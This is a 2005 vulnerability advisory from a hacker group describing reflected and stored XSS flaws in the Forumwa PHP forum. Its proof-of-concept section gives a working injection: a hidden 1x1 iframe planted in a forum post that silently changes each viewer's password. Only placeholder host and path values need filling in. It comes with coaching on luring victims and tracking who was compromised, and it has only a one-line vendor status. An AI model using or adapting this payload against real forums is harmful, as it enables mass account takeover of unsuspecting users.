Forumwa search.php xss vulnerability

[Raven <raven () tgs-security com>]

 [][][][][][][][][][][][][][][][][][][][][][][][][][]
[][][] 
 []  
 [] HRG - Hackerlounge Research Group 
 [] Release: HRG005 
 [] Monday 03/01/05 
 [] Forumwa_v1  
 []  
 [] The author can't be held responsible for any 
damage  
 [] done by a reader. You have your own resonsibility  
 [] Please use this document like it's meant to.  
 []  
 [][][][][][][][][][][][][][][][][][][][][][][][][][]
[][][]  
  
 Vulnerable: Forumwa_v1 (any version)  
  
 
 ---  
  
 General information:  
  
 Forumwa is a simple discussion forum, based on PHP 
and MYSQL. Beside the basic-features there are 
special functions like search function, user 
profiles, memberlist, mailer, feedback? 
Multilanguage, easy installation.  
  
  
 ---  
  
 Description:  
  
 The search.php script is vulnerable to a XSS attack 
by a remote attacker. The searched string is not 
filtered for any harmfull characters like < > and ". 
This makes it possible for an attacker to trick a 
user into going to a harmfull page and stealing a 
session.  
  
 Also, the body and the subject of a message posted 
on the forum are not checked for < or > characters. 
The combination of these two vulnerabilitys makes a 
real big problem.  
  
  
 ---  
  
 Proof Of Concept:  
  
 What this proof of concept will do is load a 1x1px 
IFrame from a message in the board that will abuse 
the search.php xss attack to change a viewers 
password to "wh00ters". How to use: make a post 
containing the following body and hope someone 
actually views the messages on the board. Once they 
open the link to view the post, their account is 
yours. Tip, make it a nice thread that people will 
reply to so you know who you compromised.  
  
 ---PoC Injection---  
  
 <iframe SRC=http://[HOST URL CHANGEME!!!]/[FORUM 
DIRECTORY 
CHANGEME!!!]/search.php?keyword=%3C/title%3E%3Ciframe%20SRC=http://[HOST 
URL CHANGEME!!!]/[FORUM DIRECTORY 
CHANGEME!!!]/account.php?passwdu=wh00ters%26passwda=wh00ters%26emailu=u () mail 
com%26changelog=change%20WIDTH=0%20HEIGHT=0%3E%3C/iframe%3E%3Ctitle%3E 
HEIGHT=1 WIDTH=1></iframe>  
  
 ---PoC Injection---  
  
 All that needs to be altered in this injection are 
the things between [ ] that says "CHANGEME!!!"  
  
  
 ---  
  
 Fix and Vendor status:  
  
Vendor has been notified; expect an official patch 
soon. 
  
 ---  
 
Greetz: 
 
All the people at hackerlounge.com, JWT, 
TGS-Security.com and JWT-Security.net. 
Specifically: 
 
Th3_R@v3n (me), Dlab, Riddick, Enjoi, Blademaster, 
Modzilla, Pingu, Jake Johnson, Afterburn, airo, 
cardiaC, chis, ComputerGeek, deep_phreeze, dudley, 
evasion, eXtacy, Mattewan, Afterburn, 
Thanatos_Starfire, Roz, Sirross, UmInAsHoE, Infinite, 
Slarty, NoUse, Snake (I hate you), Surreal (I hate 
you), -=Vanguard=-, The_IRS, puNKiey, driedice, 
Carnuss, oKiDaN, Mr.Mind, dementis, net-RIDER, 
voteforpedro, Cryptic_Override, kodaxx, 
~CreEpy~NoDquE~, Brainscan, the_exode, 
phillysteak12345, DerrtyJake, =>HeX<=, m0rk, and 
anyone else I forgot.  
 
 
--- 
 
Credit: 
 
HRG - Hackerlounge Research Group 
http://www.Hackerlounge.com 
 
  
 [][][][][][][][][][][][][][][][][][][][][][][][][][]
[][][]  
 []  
 [] HRG - Hackerlounge Research Group 
 [] Release: HRG005 
 [] Monday 03/01/05 
 [] Forumwa_v1  
 []  
 [] The author can't be held responsible for any 
damage  
 [] done by a reader. You have your own resonsibility  
 [] Please use this document like it's meant to.  
 []  
 [][][][][][][][][][][][][][][][][][][][][][][][][][]
[][][]